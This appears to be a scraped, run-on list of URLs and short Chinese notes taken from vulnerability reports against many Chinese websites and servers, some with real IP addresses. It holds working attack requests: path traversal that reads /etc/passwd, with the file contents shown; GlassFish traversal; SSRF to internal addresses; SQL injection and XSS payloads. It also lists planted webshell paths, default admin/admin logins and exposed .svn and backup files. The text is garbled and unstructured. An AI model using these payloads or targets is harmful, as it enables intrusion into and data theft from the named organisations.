http://www.dcdisplay.com/tp/include/fckeditor/editor/filemanager/connectors/test.html# http://admin-d.dty18.com/index.php/Public/login帐号密码都是admin http://admin-m.dty18.com/index.php/Public/login/帐号密码都是admin http://**.**.**.**:80/?act=search&keyword=2016 http://uc.263.net/ma/web/jsp/usc/index.jsp http://uc.263.net/ma/web//usc/action/app/webMailUrl.do https://mm.263.com/sadLogin.do?usr=admin@net263.com&sessionkey=admin@net263.comwm_656916399594561452757460fqhg45Odx2FnUj0p4ncxjY4XZHsADRgtHMZLR&bindid=000000 http://ad.yingxiong.com/site/login http://ad.yingxiong.com/site/login/error/%E5%AF%86%E7%A0%81%E9%94%99%E8%AF%AF http://changba.kuwo.cn/ http://**.**.**.**/news01.asp?news_index=74 http://**.**.**.**/product02.asp?sonclass=140 http://**.**.**.**/product.php?prod_item_id=10 http://**.**.**.**/ http://t.trs.com.cn/weibo_Platform_Index.do http://bk.travelsky.com/bkair/page/users/front/userLogin.jsp http://58.56.60.68:8088/yyoa/index.jsp http://qd.emaradx.com/agentquery.do finance.landray.com.cn/admin/ http://**.**.**.**/board/info/info_dtl.asp?dept_code=0000&serno=1192 http://**.**.**.**/ http://202.121.64.42:801/edoas2/login.jsp https://**.**.**.**/hk/financial/SeminarInfo?seminarCode=20160114JP http://chajian.jia.com/kaoshi/ http://chajian.jia.com/kaoshi/admin/ http://chajian.jia.com/kaoshi/admin/index.php?lfj=alonepage&job=list http://**.**.**.**:8050/sms_manage/ http://wt.**.**.**.**:8080/gsdtms/consignOrderActionForWindow!findOrder.action http://**.**.**.**:7070/gsdwl/showOperate.do?consign_no=1003020012B http://103.255.94.27/backup/weixin_reg.php http://103.255.94.27 http://top.yingxiong.com http://top.yingxiong.com/site/login http://im.youshang.com/live800/downlog.jsp?path=/&fileName=/etc/passwd root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync man:x:6:12:man:/var/cache/man:/bin/sh lp:x:7:7:lp:/var/spool/lpd:/bin/sh uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh www-data:x:33:33:www-data:/var/www:/bin/sh backup:x:34:34:backup:/var/backups:/bin/sh http://219.143.252.170/seeyon/index.jsp http://top.yingxiong.com/ http://admin.jia.com/ http://218.57.146.147:8333/mp/rest/ http://115.29.111.94:8080/ user:admin http://**.**.**.**/admin/login.jsp;jsessionid=22B3BAC03A64C2E4CBDF679E641D6870 http://zs.xust.edu.cn/searchys.jsp?years=2013 http://**.**.**.**/ www.yiban.cn http://202.108.145.118/ http://202.108.145.118/log.txt http://202.108.145.134/ jdbc:oracle:thin:@**.**.**.**:1521:orcl jdbc:oracle:thin:@**.**.**.**:1521:dev jdbc:oracle:thin:@**.**.**.**:1521:bjzdgb1 jdbc:oracle:thin:@**.**.**.**:1521:orcl jdbc:oracle:thin:@**.**.**.**:1521:sonata jdbc:oracle:thin:@**.**.**.**:1521:orcl jdbc:oracle:thin:@**.**.**.**:1521:hnuncdb jdbc:mysql://localhost:3306/test?useUnicode=false&characterEncoding=UTF-8 http://**.**.**.**/ueditor/php/upload/20151102/14464462331213.xls http://mt.sogou.com/WebResource.axd?d=1450089073 http://mt.sogou.com/WebResource.axd?d=9MBwmxN6TLKjC8S3CdFGyw2 http://mt.sogou.com/g2/M00/06/A6/CoZsllaXllqAJE9yAAAAppGzKZ070.html http://**.**.**.** http://**.**.**.**/postdoctor/down.php?f=Ly4uLy4uL2NuL2luZGV4LnBocA== http://**.**.**.**/postdoctor/down.php?f=Ly4uLy4uL2luY2x1ZGVzL2NvbmZpZy5pbmMucGhw www.bazirim.tv/phpmyadmin http://222.172.222.114/upaypc http://222.172.222.114:80 http://124.115.26.74:8081/article?id=107 http://**.**.**.**/ http://ziyuan.51taoshi.com/fore/zycenter/showZy.action?lxMess=-1 https://e.189.cn/register/mobile/step1.do http://fanxing.kugou.com/ac/kefu,选择使用天翼账号登陆爆破天翼账号密码 http://www2.lib.nankai.edu.cn/nav/ http://**.**.**.**/xzfwzx/newsQueryList.html;jsessionid=2B5F84975B78358EFD119D85D4FCB2F5?typeId=1200 http://mt.sogou.com/app/user/user?id=4762 http://**.**.**.**/HR/V_ResumeData/UResumeTable?cadetid=SXHZ20150110000052&see=1&cadet=1&close=true url:http://**.**.**.** http://**.**.**.**/HR/V_CadetAuditWork/grid?qn_eq_IsDelete=0&q_eq_RIdentityCard=330481199402180049&q_eq_ResumeID=JLHZ20151010000061 http://login.cang.com/register.html http://**.**.**.**:7001/存在“Java http://**.**.**.**:7001/存在“Java http://**.**.**.**:7001/存在“Java http://**.**.**.**/Channelnew/lawguidelist.aspx?inforId=00270存在注入点 http://oauth.tops001.com/login.html http://oauth.tops001.com/index.html#/retrievepd/newpd?type=id&loginName=13*******21&code=5362 http://oa.ccib.com.cn/login.asp  http://oa.ccib.com.cn http://122.225.59.249:8080 http://122.225.59.249:8080/script http://m2.xianguo.com/homeindex/list?cid=1&tagid=100_33 http://t.news.elong.com http://**.**.**.**/products.php?pc_index=19&pc2_index=58 http://211.151.62.149:4848/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd http://211.151.62.149:4848/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/home/glassfish/glassfish4/glassfish/domains/domain1/config/ https://yoopay.cn/ http://**.**.**.**/bbs/plugin.php?id=myshop:myshopShow&cid=103&gid=110&market=0 http://easternmiles.ceair.com/mpf/#/sign/register https://passport.ceair.com/cesso/login.html?redirectUrl=http%3A%2F%2Fwww.ceair.com%2F<v=1&local=zh_CN http://mp.allinpay.com http://**.**.**.**/ncut_oga_2013/front/main.php?pageNum_Recordset1=0&totalRows_Recordset1=20&lnk=front_news_single.php&Unit=6 http://51zhonghua.com/area/findAllCity2.action?pid=1 http://61.160.82.220:7001/eservice/eservice/account/login.action?action=init http://**.**.**.**:8080 http://www.haoshouwang.com/you/goods/id/276 http://mcmp.suning.com/mcmp/sales/downloadImg.htm file:///etc/passwd http://**.**.**.**/ http://**.**.**.**/index.php http://**.**.**.**/ http://www.pptv.com/ http://cdn1.showjoy.com/.svn/entries http://61.160.82.219:7003/payment/ http://218.66.13.64 http://apk.ws.netease.com//newscrawl/newscrawl/pic.do?picPath=file://///etc/hosts http://apk.ws.netease.com//newscrawl/newscrawl/pic.do?picPath=ftp://192.168.86.43/inc/ http://apk.ws.netease.com//newscrawl/newscrawl/pic.do?picPath=http://192.168.86.26 http://apk.ws.netease.com//newscrawl/newscrawl/pic.do?picPath=http://10.100.21.3/message.shtml http://apk.ws.netease.com//newscrawl/newscrawl/pic.do?picPath=http://192.168.52.111 http://apk.ws.netease.com//newscrawl/newscrawl/pic.do?picPath=http://192.168.86.191 http://e.waimai.meituan.com/file/app/download http://waimaieapi.meituan.com/api/account/retrievePwd/reset http://oa.sinopharm.com/ http://oa.sinopharm.com/seeyon//logs/login.log http://oa.cnbg.com.cn/seeyon//logs/login.log https://mail.guodu.com http://www.8168.com.cn/loginUI.action http://www.jxrw.com:80/search.php?searchname=%e8%af%b7%e8%be%93%e5%85%a5%e6%82%a8%e8%a6%81%e6%90%9c%e7%b4%a2%e7%9a%84%e5%86%85%e5%ae%b9&send=12345 http://www.ttkdex.com.hk:8080/hlgt/user/main.php http://60.28.104.133:9060/yyoa/ http://60.28.104.133:9000/ http://now.3g.cn/.svn/entries http://passport.proxy.3g.cn/user/logout?bk=http%3A%2F%2Fwww.wooyun.org&waped=waped http://gos.3g.cn/admin/index.php?r=site/index http://img.3gcdn.cn/nba/nba/images/interlocution_question_153049.php http://img.3gcdn.cn/nba/nba/images/interlocution_question_153423.html http://store.263.net/register/first.html http://store.263.net/recharge/buyUserPlan.action?a=0.11769770458340645&mail=wooyun2@263.net&ppid=1000000004&_=1452842159506 http://uc.263.net/ma/web/usc/action/app/webMailUrl.do http://www.263.net/ http://**.**.**.**/console/login/LoginForm.jsp http://**.**.**.**/1.jsp http://fuwu.suning.com/fuwu/portal/detail/ajax/queryDecorationDetail.htm file:/// http://icss.suning.com/icssm-web/pm/yunfeiFreightCommissionCheckController/init.htm http://**.**.**.**/shouye/common/more.jsp?cat=1003013 http://**.**.**.**/cms/index.php http://j.m.leju.com/ http://j.m.leju.com http://**.**.**.**/login/login.init.do?returnUrl=http://**.**.**.**/os/html/index.init.do&elnScreen=1366*768elnScreen)存在管理员弱口令登录,可查看大量内部学习资料 http://**.**.**.**/即 http://182.151.206.253/mysql/ http://**.**.**.**/opinions_view.php?id=97 http://**.**.**.**/admin/login.php http://120.199.7.135/downloadSoftware.action?inputPath=%2FuploadSoftware%5C20050319012047.rar http://**.**.**.**/MiceOther/Memberstyle.asp?id=22 http://**.**.**.**/news.asp?id=22&tname=%CA%D5%B2%D8%D7%CA%D1%B6 http://**.**.**.**/newsite/readtxt.asp?id=227273 http://**.**.**.**/examRule.php?id=1 http://**.**.**.**/bugs/wooyun-2010-0144595 http://nhri.cofco.com/bbs/ http://gxav.91huayi.com/webSite/news_content.aspx?news_id=8c1ba8c5-2116-4fee-b6fb-a11c00048f9e&type_id=1 http://gxav.91huayi.com/ http://red.xunlei.com/index.php?id=../test.php%00&r=site/news http://oil.cofco.com:8081/login.aspx http://162.105.205.19 http://www.wa3.com/ http://www.wa3.com/NewsCard/?gname= http://**.**.**.**/campus http://www.sydoil.com/services_detail.asp?id=1629发现sql注人,今天又发现一注入点 http://www.sydoil.com/products.asp?id=58 http://www.sydoil.com/products.asp?id=58” http://ad.yingxiong.com/ http://work.cybernaut.com.cn/seeyon/index.jsp http://www.cbooo.cn/search?k=1 http://www.cbooo.cn/search?k=1 www.cbooo.cn http://**.**.**.** http://flgm.feiliu.com/qianghaoqi/wx.php?id=2284 http://open.muzhiwan.com/?action=public&opt=login http://wooyun.org/bugs/wooyun-2010-083238 http://wooyun.org/bugs/wooyun-2010-083101 http://erp.suning.com.cn/iufotempfile/gzwkxo8p2u6ic6iynvlutt9bcvt38w/s2_102628.jsp http://shanghai.daojia.com.cn/service.php?action=1879048193&card= http://beijing.daojia.com.cn/service.php?action=1879048193&card= http://hangzhou.daojia.com.cn//service.php?action=1879048193&card= http://suzhou.daojia.com.cn//service.php?action=1879048193&card= http://nanjing.daojia.com.cn//service.php?action=1879048193&card= http://guangzhou.daojia.com.cn//service.php?action=1879048193&card= http://shenzhen.daojia.com.cn//service.php?action=1879048193&card= http://wuxi.daojia.com.cn//service.php?action=1879048193&card= http://tianjin.daojia.com.cn//service.php?action=1879048193&card= http://changzhou.daojia.com.cn///service.php?action=1879048193&card= http://www.gyxt.com.cn/ http://**.**.**.**/nz0808/manage_web.asp?txt=2&id=web2/index.asp http://www.ku6.com/ http://**.**.**.** http://1.202.165.69:7007/clqprt/ http://1.202.165.69:7007/console shell:http://1.202.165.69:7007/ca/ma3.jsp http://wep.letao.com/ http://**.**.**.** http://**.**.**.** http://180.150.185 ip:4848/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd ip:4848/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/ http://m3.xianguo.com/homeindex/list?cid=3&tagid=186_31 http://**.**.**.**/main.aspx?flag=lmMc&lm=%E5%85%9A%E9%A3%8E%E5%BB%89%E6%94%BF http://**.**.**.**/admin/ http://**.**.**.**/admin/Admin_Login.aspx http://**.**.**.**/upload/ http://v.huatu.com/yueka/plan.php?id=9&province=%E5%B9%BF%E4%B8%9C http://wenwen.m.sogou.com/qudetail.jsp?qid=478438204&g_f=18719 http://i.yingxiong.com:80/ http://**.**.**.**/index.php?r=site/detail&pid=307 http://**.**.**.**/index.php?r=site/detail http://**.**.**.**/index.php?r=site/manage http://**.**.**.**/index.php?r=site/main http://123.124.175.243/teamleader/ http://123.124.175.243/person/ http://123.124.175.243:80/console shell:http://123.124.175.243/ca/ma3.jsp http://cwy.colourlife.com/praise http://hr.colourlife.com/archive/?keyid=B1&itemid=B1-A http://academy.yonyou.com/ http://**.**.**.**/bugs/wooyun-2010-0108372 http://**.**.**.**/bugs/wooyun-2015-0110098 http://testapi.rrslj.com/appapi/index.php?act=member_order&op=order_detail&member_id=13951038888&order_id=1 https://api.weibo.com/oauth2/authorize http://music.163.com/back/weibo,并带上了授权得到的Access https://api.weibo.com/oauth2/authorize?client_id=301575942&response_type=code&redirect_uri=http://music.163.com/back/weibo&scope=friendships_groups_read,statuses_to_me_read,follow_app_official_microblog http://**.**.**.**/news/news?city=1301&id=492 http://**.**.**.**/zwgk_nr.php?id=22959 dir:I:\Java\Workspaces\MyEclipseforSpring2014\pm-tomcat\webapp\ c5d0:386a:2fb1:5fb1%12 da1e:40c2:87f:3e7e:3f57:f5e8 http://**.**.**.**//resin-doc/examples/security-basic/viewfile?file=WEB-INF/password.xml http://**.**.**.**//resin-doc/examples/security-basic/viewfile?file=WEB-INF/web.xml http://**.**.**.**/defaultroot/login.jsp http://219.143.252.48:8080/manager/html http://219.143.252.185:90/invoker/EJBInvokerServlet http://**.**.**.**/ http://106.3.36.125/dgws/ http://106.3.36.125/dgws/home/appointment/newapp?aid=426 http://106.3.36.125/dgws/home/appointment/newapp?aid= http://**.**.**.**/api/icms/getCommentNum.php?id=PAGE1348189639580631 http://sdkim.cmge.com/ http://dt.51zhonghua.com/ http://**.**.**.**/admin.php https://**.**.**.**/index.php?thispage=newsandeventsdetails&cid=2&sid=35&id=1&t=e http://**.**.**.**:8090 http://www.2cto.com/index.php?m=search&c=index&a=init&typeid=1&iteid=1&q=123qwe http://testapi.rrslj.com:80/appapi/index.php?act=goods&op=goods_list&store_id=55 http://123.157.214.9/iceszh/login.jsp http://123.157.214.9/iceszh/index.jsp http://123.157.214.9/iceszh/login!loginIndex.do即可得到登录状态 http://www.51vj.cn/login/forget http://job.rhcncpa.com http://dfiles.tms.beisen.com/resume/180002/1452882012/3de2e49c2bcf45239c81da229b89b3f9.jpg?sig_a=new.zhiye.com&sig_t=1452882063&sig=e32aec419edf4bf68471e40754fd2a44430d9e11) http://dfiles.tms.beisen.com/resume/180002/1452881991/62d0637f48a240b5bc1be763fa815da8.html?sig_a=new.zhiye.com&sig_t=1452882063&sig=e32aec419edf4bf68471e40754fd2a44430d9e11 http://agent.tj.fang.com/User/Logon http://**.**.**.**/cms/admin http://**.**.**.**/index.php/zh/)使用模板为joomla,存在远程代码执行漏洞,可获取webshell,然后渗透内网。 http://www.yaolan.com/topic/ylapp/index.shtml http://inner.800bestex.com:8090/admin/index.shtml这个文件,而且是未授权访问。 http://bfr.800best.com/manage/ www.cmd5.com查询之,得到明文密码15834169939 http://event.ztgame.com/tools/cloud-answer-file http://222.73.196.11/ http://222.73.196.11/ztrcloud-openstack-ceph.repo https://github.com/RyanTech/spider-2/ http://www.hahapinche.com/.svn/entries http://bbs.ickey.cn/index.php?ac=myinfo&app=user&userid=57253 http://**.**.**.**/ http://**.**.**.**:9080/vehweb/getsysparaminfoaction=Hd&glbm=123456&xzqh=123456&hpzl=02 http://my.leju.com/ http://my.leju.com/Settings/findPwd/index http://ly.chaoxing.com www.acunetix-referrer.com/javascript%3AdomxssExecutionSink%280%2C%22%27%5C%22%3E%3Cxsstag%3E%28%29refdxss%22%29 e.xbwl.cn/website/aboutXB/11.jsp%3FpageType%3D00%26subType%3D0%26fw%3D320 http://120.199.7.135/services.jsp http://120.199.7.135/downloadContract.action?inputPath=%2FWEB-INF%2Fweb.xml http://kid.chaoxing.com http://**.**.**.** http://**.**.**.**/ http://nscc.hnu.edu.cn/ http://nscc.hnu.edu.cn/Article_NoticeList.aspx?id=13 http://nscc.hnu.edu.cn/Article_NewsList.aspx?id=14 http://nscc.hnu.edu.cn/Article_ApplyList.aspx?id=4 http://**.**.**.**/agent/operatorLogin.action http://ask.lenovo.com.cn/html/approval.html?qid=7855 http://**.**.**.** http://**.**.**.**/bea_wls_internal/she11.jsp jdbc:oracle:thin:@**.**.**.**:1521:sgdba1 http://mpa.tju.edu.cn/page.php?p=5 http://dl.dongfeng-nissan.com.cn/ EXP:http://vote.longhoo.net/index.php?m=poster&c=index&a=poster_click&id=1 http://www.dongfeng-honda.com/honda_mediaReport.php?nid=663 http://www.dongfeng-honda.com/cr-v_newyear/.svn/entries http://vac.qq.com/common/pc/pc.html http://imgcache.gtimg.cn/channel/common/pc/js/index-1.js http://2012.paojiao.cn/download_36210_1.html?url=http%3A%2F%2Fwww.wooyun.org http://anzhuo.paojiao.cn/download_37785_1.html?url=http%3A%2F%2Fwww.wooyun.org XSS:http://uc.paojiao.cn/pages/reg.jsp?callback=--%3E%27%22%3E%3CH1%3EXSS%40HERE%3C%2FH1%3E http://uc.paojiao.cn/pages/login.jsp?callback=--%3E%27%22%3E%3CH1%3EXSS%40HERE%3C%2FH1%3E https://nexus.paojiao.cn/ http://game.kingsunsoft.com/PlayGame.aspx?GameID=@@version http://game.kingsunsoft.com/UserCenterAjax.aspx?UserID=-1%20and%201=convert%28int,%28select%20@@version%29%29--&UserName=jason1208 http://jwc.tyut.edu.cn/Detail.asp?bigId=1 http://116.213.69.250/index.php http://pms.51talk.com/.svn/entries http://ts.51talk.com/.svn/entries s.hk.weibo.com/share/api/users_show.php https://github.com/feiniu7903/feiniu_pet/blob/781d571b8e663ce0c5a98b556a11c1638e22990a/pet/pet_payment/src/main/config/payment.properties http://uhg.9you.com/vip/mall/index/game_id/76.html https://secure.yxb.com/reg.do https://secure.yxb.com/sendSoundSms.do https://secure.yxb.com encap:Ethernet AB:44:AE feab:44ae/64 Scope:Link MTU:1500 packets:87919949 packets:47758751 txqueuelen:1000 http://m.exmail.qq.com/ http://**.**.**.**/ http://**.**.**.**/lingxicloud/uploadfile/2015/0507/beizihuai.php http://fz.ydpic.sgcc.com.cn/Login_login.action http://task.www.sogou.com/taskresult?task_id=7917 http://www.cr-construction.com:99/main.asp http://www.cr-construction.com:99/shownewstest.asp?id=342 http://shop.9you.com http://shop.9you.com/active/active/name/FirstMan/act/ajaxpageall?type=GFriend http://aufamily.9you.com/index.php http://wooyun.org/bugs/wooyun-2016-0170529 http://dw.aoshitang.com https://**.**.**.**/amh1/amhhotel_login_tc.asp http://**.**.**.**/co-brand/login.asp http://**.**.**.**/admin/bonus_login.asp http://**.**.**.**/admin/news_login.asp http://**.**.**.**/admin/offers_login.asp index.php/product-getAdjunctPro.html?ijfitnfo http://www.lamiu.com/ http://acm.sdut.edu.cn/sdutoj/shownews.php?nid=24 http://data.aoshitang.com https://**.**.**.**/Docs/?dv=win http://m.mail.sogou.com/ http://aaa.ftms.com.cn/.svn/entries http://event.ftms.com.cn/rav4hd2015/.svn/entries http://event.ftms.com.cn/rav4_wljd/.svn/entries http://event.ftms.com.cn/newcrown.tar.gz http://event.ftms.com.cn/hev.tar.gz http://www.ftms.com.cn/phpMyAdmin/ http://androidtv.25pp.com http://**.**.**.**/bugs/wooyun-2015-0163789 http://**.**.**.**/ldims/login.jsp http://**.**.**.**/bugs/wooyun-2015-0163789 http://**.**.**.**/点击标识1链接后,再点击标识链接2,即可进入系统登录界面。 http://www.bkjx1.sdu.edu.cn/userfiles/20131126/46c01129-12f7-40d1-9075-682e280dde6a.doc http://140.206.94.42:7001存在“Java http://claim.chinalife-p.com.cn/claimCarFlow/flow.do?actionType=queryInfo&accidentNo=NjA1MTAyMDE1MzMwMDAwMDQzMjk5&comCode=MzMwMDAwMDA= http://claim.chinalife-p.com.cn/claimCarFlow/flow.do?actionType=queryInfo&accidentNo=NjA1MDEyMDE1NDQwMDAwMDM1NDc5&comCode=NDQwMDAwMDA= http://claim.chinalife-p.com.cn/claimCarFlow/flow.do?actionType=queryInfo&accidentNo=NjA1MDEyMDE0NDQwMDAwMjQ5Mzc0&comCode=NDQwMDAwMDA= http://claim.chinalife-p.com.cn/claimCarFlow/flow.do?actionType=queryInfo&accidentNo=NjA1MDEyMDE0NDQwMDAwMDk0ODY0&comCode=NDQwMDAwMDA= http://woa.wacom.com.cn http://www.sundan.com/ http://www.sundan.com/data/可进行目录遍历 http://ca.yingxiong.com/ca.tar.gz http://gf.yingxiong.com/gf.tar.gz http://ttx5.yingxiong.com/ttx5.tar.gz http://we.yingxiong.com/we.tar.gz http://xm.yingxiong.com/xm.tar.gz http://cemftp.ce-air.com/yyoa/index.jsp http://cemftp.ce-air.com/yyoa/DownExcelBeanServlet?contenttype=username&contentvalue=&state=0&per_id=0 http://wooyun.org/bugs/wooyun-2015-0157574 www.jointwisdom.cn/download/download.php?file=../../../../../../../../../../../etc/passwd root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin saslauth:x:499:76:"Saslauthd saslauth:/sbin/nologin postfix:x:89:89::/var/spool/postfix:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin tcpdump:x:72:72::/:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin avahi-autoipd:x:170:170:Avahi Stack:/var/lib/avahi-autoipd:/sbin/nologin jointwisdomweb:x:500:500::/home/jointwisdomweb:/bin/bash ldap:x:55:55:LDAP User:/var/lib/ldap:/sbin/nologin mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash nagios:x:501:501::/home/nagios:/bin/bash http://kjk.haoyisheng.com/kjk/login.jsp http://218.17.224.157/login.jsp http://l.airchina.com.cn/cw/skin1/jsp/download.jsp?file=/WEB-INF/web.xml http://120.25.213.204 ftp://120.25.213.204 ftp://120.25.213.204/charge/ http://**.**.**.**/ http://**.**.**.**/bb/ma3.jsp http://**.**.**.**/ma3.jsp http://**.**.**.**/tw/newspost.php?id=2265 http://**.**.**.**/tw/newspost.php?id=2079 http://**.**.**.**/tw/user.php?id=14196 http://**.**.**.**/tw/shop_list.php?ar1=&ar2=&sty=9 http://**.**.**.**/tw/news_list.php?type=a http://**.**.**.**/tw/newspost.php?id=2265 http://bbs.crvanguard.com.cn/user/login/.kisin http://bbs.crvanguard.com.cn http://bbs.crvanguard.com.cn/user/login/.kisin http://ask.sdo.com/handlerv2/getarticles?gameno=89&OperationIP=192.168.137.82&OperationLocalTime=2016-01-11%2015:32:11&OperationSystem=android&OperationVersion=6.0.0&orderby=0&orderbytype=0&pageIndex=0&pagesize=%5c&status=-999&UserId=32439845&version=a.6.0.0 http://mailserver.juneyao.com/ http://180.169.55.154:8887/login.aspx http://219.143.213.189/ http://appfinder.locojoy.com/AJAX/GetServerByArea.ashx?area=55&os=mac&t=1453011370340&_=1453011370340 index.php/Home/Index/ http://work.locojoy.com http://**.**.**.**/upload/201601/20173918c7c68e074b1626afbd3e9806b33c9e7b.png https://**.**.**.**/search?query=glassfish++port%3A4848+country%3Ahk+4.1 http://111.13.112.18:8080/ http://111.13.112.18:8080 http://219.143.162.220:8080/ECHT/alipay/index.jsp http://219.143.162.220:7001/uddiexplorer/she11.jsp http://www.chashangzg.com/Index-login.html http://**.**.**.**:8090/dispatch.action http://**.**.**.**:8091/dispatch.action http://**.**.**.**:8090/cmd.jsp http://**.**.**.**:8889/gnete-web/report!show.action http://**.**.**.**:8889/gnete-web/cmd.jsp http://e-learning.qzccbank.com http://e-learning.qzccbank.com/lds/http/content/imageCutTemp/F20160117-192921451.jspx http://**.**.**.**/newtyhp/mobile/news_detail.php?id=95990%27 http://**.**.**.**/newtyhp/mobile/news_detail.php?id=95990 http://**.**.**.**/newtyhp/mobile/news_detail.php?id=95990 http://**.**.**.**/newtyhp/mobile/news_detail.php?id=95990 http://**.**.**.**/newtyhp/mobile/news_detail.php?id=95990 http://**.**.**.**/newtyhp/mobile/news_detail.php?id=95990 http://**.**.**.**/newtyhp/mobile/news_detail.php?id=-95990%20/*!union*/%20/*!select*/%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38 http://q.letv.com/publish/ http://rtx.njzq.cn:8012/ http://rtx.njzq.cn:8012/webadmin.php http://rtx.njzq.cn:8012/userlist.php http://rtx.njzq.cn:8012/check.php http://www.flyinsky.net/index1.action http://www.flyinsky.net/1.txt http://www.flyinsky.net/bak.jsp http://www.mmall.com www.acunetix-referrer.com www.acunetix-referrer.com/javascript%3AdomxssExecutionSink%280%2C%22%27%5C%22%3E%3Cxsstag%3E%28%29refdxss%22%29&eurl=http%3A//www.mmall.com/zhuangxiu/journal.html&etime=1453033501&ctime=1453033419<ime=1453033328&compid=1727 www.mmall.com/goods-3983.html*http%3A//www.mmall.com/activity/201601pandian.html&__AD_DT-1*1453028615*http%3A//www.mmall.com/goods-35629.html*http%3A//www.mmall.com/activity/201601pandian.html&__AD_DT-1*1453028851*http%3A//www.mmall.com/goods-48678.html*http%3A//www.mmall.com/activity/201601pandian.html&__AD_DT-1*1453032970*http%3A//www.mmall.com/zhuangxiu/tu/list-1122.html*http%3A//www.mmall.com/activity/201601pandian.html&__AD_DT-1*1453033391*http%3A//www.mmall.com/zhuangxiu/tu/list-1074.html%3Fimg_id%3D18206*http%3A//www.mmall.com/activity/201601pandian.html clipboard:email:bsharesync www.mmall.com http://**.**.**.**/ http://**.**.**.**/intro_detail.php?id=4551 http://susun.l247.bizcn.com/www/susun/brokers_ok.php?id=563 http://180.97.104.104/index com:8080 com:8080 http://202.117.85.138/web/content.asp?id=803 http://202.117.85.138/news/admin.asp http://oa.hnu.cn/ http://139.129.12.107:8080/xb/index.html http://139.129.12.107:50080/ http://139.129.12.107:50080/hqfy.php?optionid=76 http://sc3.changan-mazda.com.cn:8888 http://jnjp.sinopharm.com/jnjp/home.action?m=toIndex www.c.qidian.com/qidian.rar http://218.16.100.212:8080/gionee/weibo/weixinuserManager!list?p=1&ps=10&nickname=&startTime=&endTime=&subscribe= http://221.123.177.64/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/passwd root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin rpc:x:32:32:Portmapper user:/:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin oprofile:x:16:16:Special OProfile:/home/oprofile:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin avahi:x:70:70:Avahi daemon:/:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous User:/var/lib/nfs:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin avahi-autoipd:x:100:104:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin xfs:x:43:43:X Server:/etc/X11/fs:/sbin/nologin mysql:x:500:500::/home/mysql:/sbin/nologin http://wooyun.org/bugs/wooyun-2015-0131342 http://**.**.**.**/portal_e2.php?button_num=e2 http://xueyuan.weibo.com/course/index?categoryid=&orderby_fild=3&orderby_operate=desc&key_word=¤t_type=0 http://**.**.**/pageinfo.phpcategoryid=24§ionid=6&articleid=24 http://218.26.176.181:8082/yyoa/ 